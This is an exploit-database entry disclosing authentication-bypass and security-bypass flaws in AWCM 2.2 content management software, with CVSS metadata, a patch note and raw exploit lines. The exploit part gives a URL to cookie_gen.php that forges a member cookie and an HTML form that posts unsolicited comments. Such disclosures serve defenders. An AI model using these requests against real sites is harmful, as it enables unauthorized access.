AWCM Authentication and Security Bypass Vulnerabilities

vendor:

AWCM

by:

SecurityFocus

8,8

CVSS

HIGH

Authentication Bypass and Security Bypass

287, 264

CWE

Product Name: AWCM

Affected Version From: 2.2

Affected Version To: 2.2

Patch Exists: YES

Related CWE: N/A

CPE: awcm

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

AWCM Authentication and Security Bypass Vulnerabilities

Attackers can exploit these vulnerabilities to bypass certain security restrictions, perform unauthorized actions; which may aid in further attacks. Authentication Bypass can be exploited by sending a crafted HTTP request to the vulnerable application, while Security Bypass can be exploited by sending a crafted HTTP request with a malicious comment parameter.

Mitigation:

Users should apply the patch from the vendor's website.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/56465/info

AWCM is prone to an authentication-bypass and multiple security-bypass vulnerabilities.

Attackers can exploit these vulnerabilities to bypass certain security restrictions, perform unauthorized actions; which may aid in further attacks.

AWCM 2.2 is vulnerable; other versions may also be affected. 

Authentication Bypass:

http://www.example.com/awcm/cookie_gen.php?name=\'key\'&content=\'value\'
ex) http://targethost/awcm/cookie_gen.php?
name=awcm_member&content=123456

Security Bypass:

[form action=\"http://www.example.com/awcm/show_video.php?coment=exploit\"
method=\"post\"]
[input type=\"hidden\" name=\"coment\" value=\'insert
uninvited comments 2\' /]
[input type=\"submit\" value=\"Submit\"]
</form>